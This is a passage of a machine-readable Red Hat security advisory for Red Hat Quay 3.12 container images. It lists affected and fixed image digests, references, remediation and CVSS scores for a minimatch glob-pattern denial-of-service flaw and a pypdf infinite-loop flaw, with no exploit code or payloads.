"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-26996"
},
{
"category": "external",
"summary": "RHBZ#2441268",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2441268"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-26996",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26996"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-26996",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26996"
},
{
"category": "external",
"summary": "https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5",
"url": "https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5"
},
{
"category": "external",
"summary": "https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26",
"url": "https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26"
}
],
"release_date": "2026-02-20T03:05:21.105000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-18T16:21:15+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:4942"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "minimatch: minimatch: Denial of Service via specially crafted glob patterns"
},
{
"cve": "CVE-2026-27628",
"cwe": {
"id": "CWE-835",
"name": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)"
},
"discovery_date": "2026-02-25T04:02:09.864561+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2442543"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in pypdf. Processing a specially crafted PDF document, specifically with circular /Prev references in the cross-reference (xref) chain, can cause an infinite loop and a high consumption of CPU, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "pypdf: possible infinite loop when loading circular /Prev entries in cross-reference streams",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker must be able to supply a crafted PDF file to be processed by an application using the pypdf library. This issue can cause the application to enter an infinite loop and consume a high amount of CPU resources, eventually resulting in a denial of service with no other security impact. Due to these reasons, this vulnerability has been rated with a moderate impact.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27628"
},
{
"category": "external",
"summary": "RHBZ#2442543",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442543"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27628",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27628"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27628",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27628"
},
{
"category": "external",
"summary": "https://github.com/py-pdf/pypdf/commit/0fbd95938724ad2d72688d4112207c0590f0483f",
"url": "https://github.com/py-pdf/pypdf/commit/0fbd95938724ad2d72688d4112207c0590f0483f"
},
{
"category": "external",
"summary": "https://github.com/py-pdf/pypdf/issues/3654",
"url": "https://github.com/py-pdf/pypdf/issues/3654"
},
{
"category": "external",
"summary": "https://github.com/py-pdf/pypdf/security/advisories/GHSA-2rw7-x74f-jg35",
"url": "https://github.com/py-pdf/pypdf/security/advisories/GHSA-2rw7-x74f-jg35"
}
],
"release_date": "2026-02-25T02:45:37.543000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-18T16:21:15+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:4942"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
